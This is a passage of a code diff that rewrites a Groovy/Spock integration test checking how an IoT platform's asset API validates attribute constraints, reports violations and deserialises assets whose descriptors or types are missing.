-                new Attribute<>(ModelTestAsset.PAST_TIMESTAMP_ATTRIBUTE_DESCRIPTOR, timerService.getCurrentTimeMillis()-1000L),
-                new Attribute<>(ModelTestAsset.PAST_OR_PRESENT_DATE_ATTRIBUTE_DESCRIPTOR, timerService.getNow().toDate()),
-                new Attribute<>(ModelTestAsset.FUTURE_ISO8601_ATTRIBUTE_DESCRIPTOR, DateTimeFormatter.ISO_INSTANT.format(timerService.getNow().plusMillis(100000))),
-                new Attribute<>(ModelTestAsset.FUTURE_OR_PRESENT_TIMESTAMP_ATTRIBUTE_DESCRIPTOR, timerService.getCurrentTimeMillis()+100000),
-                new Attribute<>(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR, "abcde"),
-                new Attribute<>(ModelTestAsset.NOT_EMPTY_ARRAY_ATTRIBUTE_DESCRIPTOR, [1] as Integer[]),
-                new Attribute<>(ModelTestAsset.NOT_EMPTY_MAP_ATTRIBUTE_DESCRIPTOR, [
-                        ("key1"): true
-                ] as ValueType.BooleanMap),
-                new Attribute<>(ModelTestAsset.NOT_BLANK_STRING_ATTRIBUTE_DESCRIPTOR, "abcde"),
-                new Attribute<>(ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR, new ModelTestAsset.TestObject(110, true)),
-                // Custom attributes
-                new Attribute<>("custom1", null, 456), // Any value can go in here
-                new Attribute<>("custom2", ValueType.GEO_JSON_POINT, new GeoJSONPoint(1.234, 5.678)).addMeta(
-                        new MetaItem<>(MetaItemType.CONSTRAINTS, ValueConstraint.constraints(new ValueConstraint.NotNull()))
-                )
-        )
-        def updatedModelTestAsset = assetResource.update(null, modelTestAsset.id, modelTestAsset)
-
-        then: "the save should succeed and correct values should be stored"
-        modelTestAsset != null
-        modelTestAsset.getAttribute(ModelTestAsset.REQUIRED_POSITIVE_INT_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null) == 1
-        modelTestAsset.getAttribute(ModelTestAsset.NEGATIVE_INT_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null) == -1
-        modelTestAsset.getAttribute(ModelTestAsset.SIZE_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null) == "abcde"
-        modelTestAsset.getAttribute(ModelTestAsset.SIZE_MAP_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null).size() == 3
-        modelTestAsset.getAttribute(ModelTestAsset.SIZE_MAP_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null).get("key1") == 1d
-        modelTestAsset.getAttribute(ModelTestAsset.SIZE_MAP_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null).get("key2") == 2d
-        modelTestAsset.getAttribute(ModelTestAsset.SIZE_MAP_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null).get("key3") == 3d
-        modelTestAsset.getAttribute(ModelTestAsset.SIZE_ARRAY_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null).size() == 2
-        modelTestAsset.getAttribute(ModelTestAsset.SIZE_ARRAY_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null)[0] == "arrayValue1"
-        modelTestAsset.getAttribute(ModelTestAsset.SIZE_ARRAY_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null)[1] == "arrayValue2"
-        modelTestAsset.getAttribute(ModelTestAsset.ALLOWED_VALUES_ENUM_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null) == ModelTestAsset.TestValue.ENUM_2
-        modelTestAsset.getAttribute(ModelTestAsset.ALLOWED_VALUES_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null) == "Allowed1"
-        modelTestAsset.getAttribute(ModelTestAsset.ALLOWED_VALUES_NUMBER_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null) == 1.5d
-        modelTestAsset.getAttribute(ModelTestAsset.PAST_TIMESTAMP_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null) < timerService.getCurrentTimeMillis()
-        modelTestAsset.getAttribute(ModelTestAsset.PAST_OR_PRESENT_DATE_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null).getTime() <= timerService.getCurrentTimeMillis()
-        modelTestAsset.getAttribute(ModelTestAsset.FUTURE_ISO8601_ATTRIBUTE_DESCRIPTOR).map { TimeUtil.parseTimeIso8601(it.value.orElse(null)).toEpochMilli()}.orElse(null) > timerService.getCurrentTimeMillis()
-        modelTestAsset.getAttribute(ModelTestAsset.FUTURE_OR_PRESENT_TIMESTAMP_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null) >= timerService.getCurrentTimeMillis()
-        modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null) == "abcde"
-        modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_MAP_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null).size() == 1
-        modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_MAP_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null).get("key1") == true
-        modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_ARRAY_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null).length == 1
-        modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_ARRAY_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null)[0] == 1
-        modelTestAsset.getAttribute(ModelTestAsset.NOT_BLANK_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null) == "abcde"
-        modelTestAsset.getAttribute("custom1").flatMap {it.value}.orElse(null) == 456
-        modelTestAsset.getAttribute("custom2").flatMap {it.value}.orElse(null).x == 1.234d
-        modelTestAsset.getAttribute("custom2").flatMap {it.value}.orElse(null).y == 5.678d
-        modelTestAsset.getAttribute(ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR).flatMap {it.value} != null
-        modelTestAsset.getAttribute(ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null) != null
-        modelTestAsset.getAttribute(ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.get().range == 110
-        modelTestAsset.getAttribute(ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.get().active != null
-        modelTestAsset.getAttribute(ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.get().active.booleanValue()
-
-        when: "The attribute values violate the constraints"
-        modelTestAsset.getAttribute(ModelTestAsset.REQUIRED_POSITIVE_INT_ATTRIBUTE_DESCRIPTOR).ifPresent {it.value = -1}
-        modelTestAsset.getAttribute(ModelTestAsset.NEGATIVE_INT_ATTRIBUTE_DESCRIPTOR).ifPresent {it.value = 1}
-        modelTestAsset.getAttribute(ModelTestAsset.SIZE_STRING_ATTRIBUTE_DESCRIPTOR).ifPresent {it.value = "abc"}
-        modelTestAsset.getAttribute(ModelTestAsset.SIZE_MAP_ATTRIBUTE_DESCRIPTOR).ifPresent {it.value = [
-                ("key1"): 1d
-        ] as ValueType.DoubleMap}
-        modelTestAsset.getAttribute(ModelTestAsset.SIZE_ARRAY_ATTRIBUTE_DESCRIPTOR).ifPresent {it.value = [
-                "arrayValue1"
-        ] as String[]}
-        modelTestAsset.getAttribute(ModelTestAsset.ALLOWED_VALUES_ENUM_ATTRIBUTE_DESCRIPTOR).ifPresent {
-            it.value = null
-        }
-        modelTestAsset.getAttribute(ModelTestAsset.ALLOWED_VALUES_STRING_ATTRIBUTE_DESCRIPTOR).ifPresent {it.value = "NotAllowed"}
-        modelTestAsset.getAttribute(ModelTestAsset.ALLOWED_VALUES_NUMBER_ATTRIBUTE_DESCRIPTOR).ifPresent {it.value = 3.0d}
-        modelTestAsset.getAttribute(ModelTestAsset.PAST_TIMESTAMP_ATTRIBUTE_DESCRIPTOR).ifPresent {it.value = timerService.getCurrentTimeMillis() + 100000}
-        modelTestAsset.getAttribute(ModelTestAsset.PAST_OR_PRESENT_DATE_ATTRIBUTE_DESCRIPTOR).ifPresent {it.value = timerService.getNow().plusMillis(100000).toDate()}
-        modelTestAsset.getAttribute(ModelTestAsset.FUTURE_ISO8601_ATTRIBUTE_DESCRIPTOR).ifPresent { it.value = DateTimeFormatter.ISO_INSTANT.format(timerService.getNow().minus(1, ChronoUnit.DAYS))}
-        modelTestAsset.getAttribute(ModelTestAsset.FUTURE_OR_PRESENT_TIMESTAMP_ATTRIBUTE_DESCRIPTOR).ifPresent {it.value = timerService.getNow().minus(1, ChronoUnit.DAYS).toEpochMilli()}
-        modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR).ifPresent {it.value = ""}
-        modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_MAP_ATTRIBUTE_DESCRIPTOR).ifPresent {it.value = [] as ValueType.BooleanMap}
-        modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_ARRAY_ATTRIBUTE_DESCRIPTOR).ifPresent {it.value = [] as Integer[]}
-        modelTestAsset.getAttribute(ModelTestAsset.NOT_BLANK_STRING_ATTRIBUTE_DESCRIPTOR).ifPresent {it.value = "      "}
-        modelTestAsset.getAttribute(ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR).ifPresent {it.value = new ModelTestAsset.TestObject(90, null)}
-        modelTestAsset.getAttribute("custom1").ifPresent {it.value = 123}
-        modelTestAsset.getAttribute("custom2").ifPresent {it.value = null}
-        modelTestAsset = assetResource.update(null, modelTestAsset.id, modelTestAsset)
-
-        then: "a constraint violation exception should be thrown"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when: "the report is extracted"
-        report = ex.response.readEntity(ViolationReport)
-
-        then: "it should contain all the errors"
-        report.propertyViolations.size() == 19
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.REQUIRED_POSITIVE_INT_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must be greater than or equal to 0"}
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.NEGATIVE_INT_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must be less than or equal to 0"}
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.SIZE_STRING_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "size must be between 5 and 10"}
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.SIZE_MAP_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "size must be between 2 and 3"}
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.SIZE_ARRAY_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "size must be between 2 and 3"}
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.ALLOWED_VALUES_ENUM_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must not be null"}
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.ALLOWED_VALUES_STRING_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must be one of [Allowed1, Allowed2]"}
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.ALLOWED_VALUES_NUMBER_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must be one of [1.5, 2.5]"}
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.PAST_TIMESTAMP_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must be a past date"}
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.PAST_OR_PRESENT_DATE_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must be a date in the past or in the present"}
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.FUTURE_ISO8601_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must be a future date"}
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.FUTURE_OR_PRESENT_TIMESTAMP_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must be a date in the present or in the future"}
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must not be empty"}
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.NOT_EMPTY_MAP_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must not be empty"}
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.NOT_EMPTY_ARRAY_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "must not be empty"}
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.NOT_BLANK_STRING_ATTRIBUTE_DESCRIPTOR.name}].value" && it.message == "Not blank custom message"}
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR.name}].value.range" && it.message == "must be greater than or equal to 100"}
-        report.propertyViolations.any {it.path == "attributes[${ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR.name}].value.active" && it.message == "must not be null"}
-        report.classViolations.size() == 1
-        report.classViolations.get(0).path == ""
-        report.classViolations.get(0).message == "Asset is not valid"
-
-        when: "we convert the asset to JSON object so we can manipulate it"
-        modelTestAsset = updatedModelTestAsset // Reset attributes to valid values
-        def assetObjectNode = ValueUtil.convert(modelTestAsset, ObjectNode) as ObjectNode
-
-        and: "we simulate an attribute descriptor being removed or changed (by changing the attribute name)"
-        def noDescriptorAttr = ((ObjectNode)assetObjectNode.get("attributes")).remove(ModelTestAsset.PAST_TIMESTAMP_ATTRIBUTE_DESCRIPTOR.name) as ObjectNode
-        noDescriptorAttr.put("name", "missingAttr")
-        ((ObjectNode)assetObjectNode.get("attributes")).set("missingAttr", noDescriptorAttr)
-
-        and: "we simulate a meta item descriptor being removed or changed (by changing the meta item name)"
-        def noDescriptorMeta = ((ObjectNode)((ObjectNode)((ObjectNode)assetObjectNode.get("attributes")).get(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR.name)).get("meta")).remove(MetaItemType.CONSTRAINTS.name)
-        ((ObjectNode)((ObjectNode)((ObjectNode)assetObjectNode.get("attributes")).get(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR.name)).get("meta")).set("missingMeta", noDescriptorMeta)
-
-        and: "we simulate a value descriptor being removed or changed (by changing the type name of an attribute)"
-        ((ObjectNode)((ObjectNode)assetObjectNode.get("attributes")).get(ModelTestAsset.PAST_OR_PRESENT_DATE_ATTRIBUTE_DESCRIPTOR.name)).put("type", "missingType")
-
-        and: "we simulate a value descriptor being removed on a custom attribute (by changing the type name of the attribute)"
-        ((ObjectNode)((ObjectNode)assetObjectNode.get("attributes")).get("custom1")).put("type", "missingType2")
-
-        and: "we deserialise the object back into an Asset"
-        modelTestAsset = ValueUtil.parse(assetObjectNode.toString(), Asset).orElse(null) as ModelTestAsset
-
-        then: "the attribute with the missing attribute descriptor should still have the correct value type and value should have deserialised correctly"
-        modelTestAsset.getAttribute("missingAttr").map {it.type}.orElse(null) == ValueType.TIMESTAMP
-        modelTestAsset.getAttribute("missingAttr").flatMap {it.value}.orElse(null) instanceof Long
-
-        and: "the meta item with the missing meta item descriptor should now have no value type and the value should be an array of generic maps representing the value constraints"
-        modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {it.getMeta().get("missingMeta")}.orElse(null) != null
-        modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {it.getMeta().get("missingMeta")}.orElse(null).type == null
-        modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {it.getMeta().get("missingMeta")}.flatMap {it.value}.orElse(null).getClass().isArray()
-        Array.getLength(modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {it.getMeta().get("missingMeta")}.flatMap {it.value}.orElse(null)) == 1
-        Array.get(modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {it.getMeta().get("missingMeta")}.flatMap {it.value}.orElse(null), 0) instanceof Map
-
-        and: "the well known attribute with the missing value type should have the correct value type"
-        modelTestAsset.getAttribute(ModelTestAsset.PAST_OR_PRESENT_DATE_ATTRIBUTE_DESCRIPTOR.name).map {it.type}.orElse(null) == ModelTestAsset.PAST_OR_PRESENT_DATE_ATTRIBUTE_DESCRIPTOR.type
-
-        and: "the custom attribute with the missing value type should have no value type but the value should still be there"
-        modelTestAsset.getAttribute("custom1").map {it.type}.isEmpty()
-        modelTestAsset.getAttribute("custom1").flatMap {it.value}.orElse(null) == 456
-
-        when: "the attribute with the missing attribute descriptor now violates its' previous constraint"
-        modelTestAsset.getAttribute("missingAttr").ifPresent {it.value = timerService.getCurrentTimeMillis() + 100000}
-
-        and: "this asset is now merged"
-        modelTestAsset = assetResource.update(null, modelTestAsset.id, modelTestAsset)
-
-        then: "it should succeed and attribute value should be correct"
-        modelTestAsset != null
-        modelTestAsset.getAttribute("missingAttr").flatMap {it.value}.orElse(null) == timerService.getCurrentTimeMillis() + 100000
-
-        when: "we simulate a missing asset type"
-        def updateResult = persistenceService.doReturningTransaction {em ->
-            def query = em.createNativeQuery("update asset set type = 'MissingAssetType' where id = '" + modelTestAsset.id + "';")
-            return query.executeUpdate()
-        }
-
-        then: "it should have succeeded"
-        updateResult == 1
-
-        when: "the model test asset is now fetched"
-        def missingAssetTypeAsset = assetResource.get(null, modelTestAsset.id)
-
-        then: "the missing type string should still be present"
-        missingAssetTypeAsset != null
-        missingAssetTypeAsset.type == "MissingAssetType"
-
-        when: "an attribute value violates one of the original asset type attribute descriptor constraints"
-        missingAssetTypeAsset.getAttribute(ModelTestAsset.NOT_BLANK_STRING_ATTRIBUTE_DESCRIPTOR).ifPresent { it.value = "    "}
-        missingAssetTypeAsset = assetResource.update(null, missingAssetTypeAsset.id, missingAssetTypeAsset)
-
-        then: "the update should succeed because the descriptor is no longer associated with the asset"
-        missingAssetTypeAsset.getAttribute(ModelTestAsset.NOT_BLANK_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {it.value}.orElse(null) == "    "
-
-        when: "a custom asset type is persisted (using dynamic CustomAsset)"
-        def customAsset = new ThingAsset("Custom asset").setRealm(MASTER_REALM)
-            .addAttributes(
-                    new Attribute<>("attr1", ValueType.TIMESTAMP, getClockTimeOf(container)),
-                    new Attribute<>("attr2", ValueType.POSITIVE_INTEGER, 3)
+    given: "an authenticated admin user"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
             )
-        customAsset.type = CUSTOM_ASSET_TYPE
-        customAsset = assetResource.create(null, customAsset)
+    stopPseudoClock()
 
-        then: "a constraint violation exception should be thrown"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
+    and: "the asset resource"
+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
 
-        when: "the report is extracted"
-        report = ex.response.readEntity(ViolationReport)
+    expect: "the custom asset type to be loaded"
+    ValueUtil.getAssetDescriptor("CustomAsset").isPresent()
 
-        then: "the missing required attribute should be included"
-        report.propertyViolations.size() == 1
-        report.propertyViolations.get(0).path == "attributes.dynamic1"
-        report.propertyViolations.get(0).message == "required attribute is missing"
-        report.classViolations.size() == 1
-        report.classViolations.get(0).path == ""
-        report.classViolations.get(0).message == "Asset is not valid"
+    when: "A well known asset is instantiated"
+    def persistenceService = container.getService(PersistenceService.class)
+    def timerService = container.getService(TimerService.class)
+    def modelTestAsset = new ModelTestAsset("Test Asset")
+    modelTestAsset.setRealm("master")
 
-        when: "the issue is resolved"
-        customAsset.addAttributes(
-                new Attribute<>("dynamic1", dynamicValueDescriptors[0] , "value1")
-        )
-        customAsset = assetResource.create(null, customAsset)
+    and: "try to save the asset without meeting constraints on required attributes"
+    assetResource.create(null, modelTestAsset)
 
-        then: "it should have been persisted"
-        customAsset != null
-        customAsset.type == "CustomAsset"
-        customAsset.getAttribute("attr1").get().type == ValueType.TIMESTAMP
-        customAsset.getAttribute("attr2").get().type == ValueType.POSITIVE_INTEGER
-        customAsset.getAttribute("attr2").get().value.orElse(0) == 3
+    then: "a constraint violation exception should be thrown"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+    def report = ex.response.readEntity(ViolationReport)
+    report.propertyViolations.size() == 1
+    report.propertyViolations.get(0).path == "attributes[positiveInt].value"
+    report.propertyViolations.get(0).message == "must not be null"
+    report.classViolations.size() == 1
+    report.classViolations.get(0).path == ""
+    report.classViolations.get(0).message == "Asset is not valid"
 
-        when: "we fetch the custom asset again directly from the DB"
-        customAsset = assetResource.get(null, customAsset.id)
+    when: "the issue is fixed and the asset is saved again"
+    modelTestAsset.getAttribute(ModelTestAsset.REQUIRED_POSITIVE_INT_ATTRIBUTE_DESCRIPTOR).map(attr -> attr.setValue(1))
+    modelTestAsset = assetResource.create(null, modelTestAsset)
 
-        then: "it should still have the correct custom type"
-        customAsset != null
-        customAsset.type == "CustomAsset"
-        customAsset.getAttribute("attr1").get().type == ValueType.TIMESTAMP
-        customAsset.getAttribute("attr2").get().type == ValueType.POSITIVE_INTEGER
-        customAsset.getAttribute("attr2").get().value.orElse(0) == 3
+    then: "the save should succeed"
+    modelTestAsset != null
+    modelTestAsset.getAttribute(ModelTestAsset.REQUIRED_POSITIVE_INT_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null) == 1
 
-        when: "we make a change to the asset and merge it directly into the asset storage service (bypassing any cloning logic in AssetResource)"
-        customAsset.getAttribute("dynamic1").ifPresent {it.setValue("value2")}
-        customAsset = assetStorageService.merge(customAsset, false, null, null)
+    when: "other optional attributes are added with valid values"
+    modelTestAsset.addAttributes(
+            new Attribute<>(ModelTestAsset.NEGATIVE_INT_ATTRIBUTE_DESCRIPTOR, -1),
+            new Attribute<>(ModelTestAsset.SIZE_STRING_ATTRIBUTE_DESCRIPTOR, "abcde"),
+            new Attribute<>(ModelTestAsset.SIZE_MAP_ATTRIBUTE_DESCRIPTOR, [
+              ("key1"): 1d,
+              ("key2"): 2d,
+              ("key3"): 3d
+            ] as ValueType.DoubleMap
+            ),
+            new Attribute<>(ModelTestAsset.SIZE_ARRAY_ATTRIBUTE_DESCRIPTOR, ["arrayValue1", "arrayValue2"] as String[]),
+            new Attribute<>(ModelTestAsset.ALLOWED_VALUES_ENUM_ATTRIBUTE_DESCRIPTOR, ModelTestAsset.TestValue.ENUM_2).addMeta(
+                    new MetaItem<>(MetaItemType.CONSTRAINTS, ValueConstraint.constraints(new ValueConstraint.NotNull()))
+                    ),
+            new Attribute<>(ModelTestAsset.ALLOWED_VALUES_STRING_ATTRIBUTE_DESCRIPTOR, "Allowed1"),
+            new Attribute<>(ModelTestAsset.ALLOWED_VALUES_NUMBER_ATTRIBUTE_DESCRIPTOR, 1.5d),
+            new Attribute<>(ModelTestAsset.PAST_TIMESTAMP_ATTRIBUTE_DESCRIPTOR, timerService.getCurrentTimeMillis()-1000L),
+            new Attribute<>(ModelTestAsset.PAST_OR_PRESENT_DATE_ATTRIBUTE_DESCRIPTOR, timerService.getNow().toDate()),
+            new Attribute<>(ModelTestAsset.FUTURE_ISO8601_ATTRIBUTE_DESCRIPTOR, DateTimeFormatter.ISO_INSTANT.format(timerService.getNow().plusMillis(100000))),
+            new Attribute<>(ModelTestAsset.FUTURE_OR_PRESENT_TIMESTAMP_ATTRIBUTE_DESCRIPTOR, timerService.getCurrentTimeMillis()+100000),
+            new Attribute<>(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR, "abcde"),
+            new Attribute<>(ModelTestAsset.NOT_EMPTY_ARRAY_ATTRIBUTE_DESCRIPTOR, [1] as Integer[]),
+            new Attribute<>(ModelTestAsset.NOT_EMPTY_MAP_ATTRIBUTE_DESCRIPTOR, [
+              ("key1"): true
+            ] as ValueType.BooleanMap),
+            new Attribute<>(ModelTestAsset.NOT_BLANK_STRING_ATTRIBUTE_DESCRIPTOR, "abcde"),
+            new Attribute<>(ModelTestAsset.OBJECT_ATTRIBUTE_DESCRIPTOR, new ModelTestAsset.TestObject(110, true)),
+            // Custom attributes
+            new Attribute<>("custom1", null, 456), // Any value can go in here
+            new Attribute<>("custom2", ValueType.GEO_JSON_POINT, new GeoJSONPoint(1.234, 5.678)).addMeta(
+                    new MetaItem<>(MetaItemType.CONSTRAINTS, ValueConstraint.constraints(new ValueConstraint.NotNull()))
+                    )
+            )
+    def updatedModelTestAsset = assetResource.update(null, modelTestAsset.id, modelTestAsset)
 
-        then: "it should succeed"
-        customAsset.getAttribute("dynamic1").flatMap {it.value}.orElse(null) == "value2"
-        customAsset.type == "CustomAsset"
+    then: "the save should succeed and correct values should be stored"
+    modelTestAsset != null
+    modelTestAsset.getAttribute(ModelTestAsset.REQUIRED_POSITIVE_INT_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null) == 1
+    modelTestAsset.getAttribute(ModelTestAsset.NEGATIVE_INT_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null) == -1
+    modelTestAsset.getAttribute(ModelTestAsset.SIZE_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null) == "abcde"
+    modelTestAsset.getAttribute(ModelTestAsset.SIZE_MAP_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null).size() == 3
+    modelTestAsset.getAttribute(ModelTestAsset.SIZE_MAP_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null).get("key1") == 1d
+    modelTestAsset.getAttribute(ModelTestAsset.SIZE_MAP_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null).get("key2") == 2d
+    modelTestAsset.getAttribute(ModelTestAsset.SIZE_MAP_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null).get("key3") == 3d
+    modelTestAsset.getAttribute(ModelTestAsset.SIZE_ARRAY_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null).size() == 2
+    modelTestAsset.getAttribute(ModelTestAsset.SIZE_ARRAY_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null)[0] == "arrayValue1"
+    modelTestAsset.getAttribute(ModelTestAsset.SIZE_ARRAY_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null)[1] == "arrayValue2"
+    modelTestAsset.getAttribute(ModelTestAsset.ALLOWED_VALUES_ENUM_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null) == ModelTestAsset.TestValue.ENUM_2
+    modelTestAsset.getAttribute(ModelTestAsset.ALLOWED_VALUES_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null) == "Allowed1"
+    modelTestAsset.getAttribute(ModelTestAsset.ALLOWED_VALUES_NUMBER_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null) == 1.5d
+    modelTestAsset.getAttribute(ModelTestAsset.PAST_TIMESTAMP_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null) <timerService.getCurrentTimeMillis()
+    modelTestAsset.getAttribute(ModelTestAsset.PAST_OR_PRESENT_DATE_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null).getTime() <= timerService.getCurrentTimeMillis()
+    modelTestAsset.getAttribute(ModelTestAsset.FUTURE_ISO8601_ATTRIBUTE_DESCRIPTOR).map {
+      TimeUtil.parseTimeIso8601(it.value.orElse(null)).toEpochMilli()
+    }.orElse(null) > timerService.getCurrentTimeMillis()
+    modelTestAsset.getAttribute(ModelTestAsset.FUTURE_OR_PRESENT_TIMESTAMP_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null) >= timerService.getCurrentTimeMillis()
+    modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null) == "abcde"
+    modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_MAP_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null).size() == 1
+    modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_MAP_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null).get("key1") == true
+    modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_ARRAY_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null).length == 1
+    modelTestAsset.getAttribute(ModelTestAsset.NOT_EMPTY_ARRAY_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null)[0] == 1
+    modelTestAsset.getAttribute(ModelTestAsset.NOT_BLANK_STRING_ATTRIBUTE_DESCRIPTOR).flatMap {
+      it.value
+    }.orElse(null) == "abcde"
+    modelTestAsset.getAttribute("custom1").flatMap {it.value}.orElse(null) == 456
+    modelTestAsset.getAttribute("custom2").flatMap {it.value}.orElse(null).x == 1.234d
